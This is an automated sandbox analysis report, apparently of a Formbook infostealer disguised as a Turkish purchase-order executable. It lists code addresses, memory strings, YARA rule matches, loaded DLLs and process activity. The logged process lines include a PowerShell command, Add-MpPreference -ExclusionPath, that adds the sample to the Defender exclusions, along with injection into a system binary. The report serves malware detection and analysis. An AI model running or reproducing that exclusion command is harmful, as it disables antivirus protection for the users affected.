Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_045F7D73	7_2_045F7D73
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_0455FDC0	7_2_0455FDC0
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_04549EB0	7_2_04549EB0
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_045FFF09	7_2_045FFF09
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_04541F92	7_2_04541F92
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_045FFFB1	7_2_045FFFB1
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_045AD800	7_2_045AD800
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_045438E0	7_2_045438E0
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_04549950	7_2_04549950
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_0455B950	7_2_0455B950
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_045D5910	7_2_045D5910
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_045FFA49	7_2_045FFA49
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_045F7A46	7_2_045F7A46
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_045B3A6C	7_2_045B3A6C
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_045EDAC6	7_2_045EDAC6
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_045DDAAC	7_2_045DDAAC
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_04585AA0	7_2_04585AA0
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_045E1AA3	7_2_045E1AA3
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_045FFB76	7_2_045FFB76
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_045B5BF0	7_2_045B5BF0
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_0457DBF9	7_2_0457DBF9
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_0455FB80	7_2_0455FB80
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_00421920	7_2_00421920
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_0043A430	7_2_0043A430
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_0041CB18	7_2_0041CB18
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_0041CB20	7_2_0041CB20
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_0041CD40	7_2_0041CD40
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_0041ADC0	7_2_0041ADC0
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_0042345B	7_2_0042345B
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_00423460	7_2_00423460
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_0435A4E9	7_2_0435A4E9
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_0435C1BC	7_2_0435C1BC
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_0435B228	7_2_0435B228
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_0435BD08	7_2_0435BD08
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_0435BE24	7_2_0435BE24

Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: String function: 04575130 appears 58 times
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: String function: 0452B970 appears 280 times
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: String function: 045AEA12 appears 86 times
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: String function: 04587E54 appears 111 times
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: String function: 045BF290 appears 105 times
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: String function: 0143EA12 appears 86 times
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: String function: 01405130 appears 58 times
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: String function: 0144F290 appears 105 times
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: String function: 013BB970 appears 280 times
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: String function: 01417E54 appears 102 times

Source: Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe, 00000000.00000002.1403395236.0000000000B4E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe
Source: Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe, 00000000.00000002.1404111165.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRT.dll. vs Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe
Source: Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe, 00000000.00000002.1410260281.00000000048D0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe
Source: Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe, 00000000.00000002.1405546295.00000000042AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe
Source: Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe, 00000000.00000002.1418897295.0000000005330000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameRT.dll. vs Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe
Source: Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe, 00000005.00000002.1607976712.00000000014BD000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe
Source: Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe, 00000005.00000002.1607512166.0000000000F28000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: periodtrackConductortrackComposertrackPerformertrackNumbertrackTitleWMContentIDpublisherRatingproviderStylealbumArtistalbumTitleWMCollectionGroupIDWMCollectionIDgenrelabelreleaseDatecommunityRatingdataProviderWM/IsCompilationAverageLevelPeakValueWM/WMCPDistributorIDWM/WMCPDistributorWM/WMShadowFileSourceDRMTypeWM/WMShadowFileSourceFileTypeWM/MediaOriginalBroadcastDateTimeWM/MediaOriginalChannelWM/MediaStationNameWM/SubTitleDescriptionWM/SubscriptionContentIDWM/ContentDistributorWM/ProviderStyleWM/ProviderRatingWM/ProviderWM/ISRCWM/DRMWM/CodecWM/PlaylistDelayWM/RadioStationOwnerWM/RadioStationNameWM/ModifiedByWM/UniqueFileIdentifierWM/WMCollectionGroupIDWM/WMCollectionIDWM/WMContentIDWM/DVDIDWM/TextWM/MoodWM/InitialKeyWM/BeatsPerMinuteWM/ParentalRatingWM/LanguageWM/AudioSourceURLWM/AudioFileURLWM/UserWebURLWM/AuthorURLWM/EncodingTimeWM/EncodingSettingsWM/EncodedByWM/PublisherWM/OriginalFilenameWM/OriginalReleaseYearWM/OriginalAlbumTitleWM/OriginalArtistWM/OriginalLyricistWM/Lyrics_SynchronisedWM/PictureWM/CategoryWM/PeriodWM/MediaClassSecondaryIDWM/MediaClassPrimaryIDWM/VideoFrameRateWM/VideoWidthWM/VideoHeightWM/ProtectionTypeWM/PartOfSetWM/SubTitleWM/ContentGroupDescriptionWM/DirectorWM/ProducerWM/ConductorWM/WriterAspectRatioYAspectRatioXWM/AlbumArtistIsVBRWM/ToolVersionWM/ToolNameWM/TrackNumberWM/LyricsWM/ComposerWM/MCDIWM/GenreIDWM/YearWM/GenreWM/AlbumCoverURLWM/PromotionURLWM/AlbumTitleDRM_IndividualizedVersionDRM_KeyIDCopyrightDescriptionAuthorTitleFileSizeCurrentBitrateIs_ProtectedDuration vs Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe
Source: Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe, 00000005.00000002.1607512166.0000000000F28000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameunregmp2.exej% vs Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe
Source: Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe, 00000005.00000002.1607512166.0000000000F99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameunregmp2.exej% vs Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe
Source: Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Binary or memory string: OriginalFilenameupNO.exe\ vs Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe

Source: Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 5.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 5.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000002.3851020084.0000000005020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.1608845942.00000000016E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.3845669243.0000000000410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.1607201928.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.3848068617.0000000000D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.3847970736.0000000000D30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.1608954398.0000000001720000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.3848399247.0000000002FD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.44d5580.2.raw.unpack, zLmOuGeWlNMagjT0Ho.cs	Security API names: _0020.SetAccessControl
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.44d5580.2.raw.unpack, zLmOuGeWlNMagjT0Ho.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.44d5580.2.raw.unpack, zLmOuGeWlNMagjT0Ho.cs	Security API names: _0020.AddAccessRule
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.48d0000.4.raw.unpack, rqgY43I29yopioxdeG.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.45597a0.3.raw.unpack, rqgY43I29yopioxdeG.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.48d0000.4.raw.unpack, zLmOuGeWlNMagjT0Ho.cs	Security API names: _0020.SetAccessControl
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.48d0000.4.raw.unpack, zLmOuGeWlNMagjT0Ho.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.48d0000.4.raw.unpack, zLmOuGeWlNMagjT0Ho.cs	Security API names: _0020.AddAccessRule
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.44d5580.2.raw.unpack, rqgY43I29yopioxdeG.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.45597a0.3.raw.unpack, zLmOuGeWlNMagjT0Ho.cs	Security API names: _0020.SetAccessControl
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.45597a0.3.raw.unpack, zLmOuGeWlNMagjT0Ho.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.45597a0.3.raw.unpack, zLmOuGeWlNMagjT0Ho.cs	Security API names: _0020.AddAccessRule

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@10/7@17/10

Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.log

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7912:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jt4ezjzt.bti.ps1

Jump to behavior

Source: Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unregmp2.exe, 00000007.00000002.3846142193.00000000006D4000.00000004.00000020.00020000.00000000.sdmp, unregmp2.exe, 00000007.00000003.1789038202.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, unregmp2.exe, 00000007.00000003.1787102794.00000000006B3000.00000004.00000020.00020000.00000000.sdmp, unregmp2.exe, 00000007.00000003.1787229007.00000000006D4000.00000004.00000020.00020000.00000000.sdmp, unregmp2.exe, 00000007.00000002.3846142193.0000000000703000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Virustotal: Detection: 31%
Source: Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	ReversingLabs: Detection: 21%

Source: unknown	Process created: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe "C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe"
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Process created: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe "C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe"
Source: C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe	Process created: C:\Windows\SysWOW64\unregmp2.exe "C:\Windows\SysWOW64\unregmp2.exe"
Source: C:\Windows\SysWOW64\unregmp2.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Process created: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe "C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe"	Jump to behavior
Source: C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe	Process created: C:\Windows\SysWOW64\unregmp2.exe "C:\Windows\SysWOW64\unregmp2.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
